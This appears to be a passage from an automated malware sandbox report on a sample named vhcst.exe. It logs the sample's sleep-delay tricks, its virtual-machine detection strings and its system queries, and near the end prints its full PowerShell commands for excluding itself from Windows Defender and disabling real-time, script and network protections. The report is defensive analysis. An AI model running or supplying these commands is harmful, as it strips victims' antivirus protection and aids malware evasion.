                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\2716439\vhcst.exeMemory allocated: 23FBA790000 memory reserve | memory write watchJump to behavior
                  Source: C:\2716439\vhcst.exeMemory allocated: 23FD40F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\7037005\vhcst.exeMemory allocated: 21F833C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\7037005\vhcst.exeMemory allocated: 21F9B5B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\2716439\vhcst.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598452Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598340Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598230Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598120Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597796Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597577Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597315Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597186Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597074Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 596968Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 596859Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\7037005\vhcst.exeWindow / User API: threadDelayed 8055Jump to behavior
                  Source: C:\7037005\vhcst.exeWindow / User API: threadDelayed 1752Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4151
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5665
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2348
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1367
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3005
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1410
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3541
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1969
                  Source: C:\2716439\vhcst.exe TID: 7952Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -99873s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -99765s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -99546s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -99437s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -99327s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -99218s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -99109s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -99000s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -98890s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -98781s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -98671s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -98562s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -598452s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -598340s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -598230s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -598120s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -598015s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -597796s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -597577s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -597468s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -597315s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -597186s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -597074s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -596968s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -596859s >= -30000sJump to behavior
                  Source: C:\7037005\vhcst.exe TID: 8008Thread sleep time: -596750s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep count: 4151 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012Thread sleep count: 5665 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep count: 2348 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2336Thread sleep count: 1367 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep count: 3005 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep count: 1410 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep count: 3541 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep count: 1969 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: C:\2716439\vhcst.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 99873Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 99765Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 99546Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 99437Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 99327Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 99218Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 99109Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 99000Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 98890Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 98781Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 98671Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 98562Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598452Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598340Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598230Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598120Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597796Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597577Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597315Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597186Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 597074Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 596968Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 596859Jump to behavior
                  Source: C:\7037005\vhcst.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, SYTv5.scr.6.drBinary or memory string: vboxtray
                  Source: SYTv5.scr.6.drBinary or memory string: vboxservice
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, SYTv5.scr.6.drBinary or memory string: qemu-ga
                  Source: SYTv5.scr.6.drBinary or memory string: vmwareuser
                  Source: vhcst.exe, 00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmp, SYTv5.scr.6.drBinary or memory string: vmusrvc
                  Source: SYTv5.scr.6.drBinary or memory string: vmwareservice+discordtokenprotector
                  Source: SYTv5.scr.6.drBinary or memory string: vmsrvc
                  Source: SYTv5.scr.6.drBinary or memory string: vmtoolsd
                  Source: SYTv5.scr.6.drBinary or memory string: vmwaretray
                  Source: vhcst.exe, 00000006.00000002.2219804829.0000021F81B17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
                  Source: C:\7037005\vhcst.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\2716439\vhcst.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe'
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe'Jump to behavior
                  Modifies Windows Defender protection settings
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                  Source: C:\7037005\vhcst.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
